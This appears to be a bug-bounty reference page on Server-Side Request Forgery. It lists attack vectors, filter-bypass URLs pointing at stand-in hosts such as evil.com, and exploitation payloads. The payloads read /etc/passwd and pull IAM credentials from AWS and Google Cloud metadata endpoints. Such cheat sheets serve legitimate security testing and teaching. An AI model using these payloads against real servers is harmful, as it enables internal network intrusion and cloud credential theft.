Home / Bug Bounty / SSRF
Critical | A10:2021

🔄 Server-Side Request Forgery (SSRF)

OWASPA10:2021
CVSS9.0-10.0
TypeInjection
DifficultyMedium

🧠 Description

SSRF allows attackers to induce the server-side application to make HTTP requests to an arbitrary domain of the attacker's choosing. This can lead to internal service access, cloud metadata compromise, and data exfiltration.

Attack Vectors:
  • URL parameters: ?url=http://internal.local
  • File fetching: /fetch?file=http://evil.com
  • Webhooks: callback_url parameter
  • PDF generation: Render URL as image

🛡️ Bypass Techniques

# Localhost variants
http://127.0.0.1
http://localhost
http://0

# IPv6
http://[::1]

# URL encoding
http://%31%32%37%2e%30%2e%30%2e%31

# Decimal IP
http://2130706433

# DNS rebinding
http://attacker.com#.127.0.0.1

# Open redirect chaining
http://trusted.com/redirect?url=http://evil.com

# Cloud metadata (AWS)
http://169.254.169.254/latest/meta-data/

💣 Exploitation Examples

# Port scanning internal
?url=http://192.168.1.1:22
?url=http://internal-db:3306

# File inclusion
?url=file:///etc/passwd
?url=file:///C:/Windows/win.ini

# Cloud metadata
# AWS
?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/

# Google Cloud
?url=http://metadata.google.internal/computeMetadata/v1/

📚 References

Back to Bug Bounty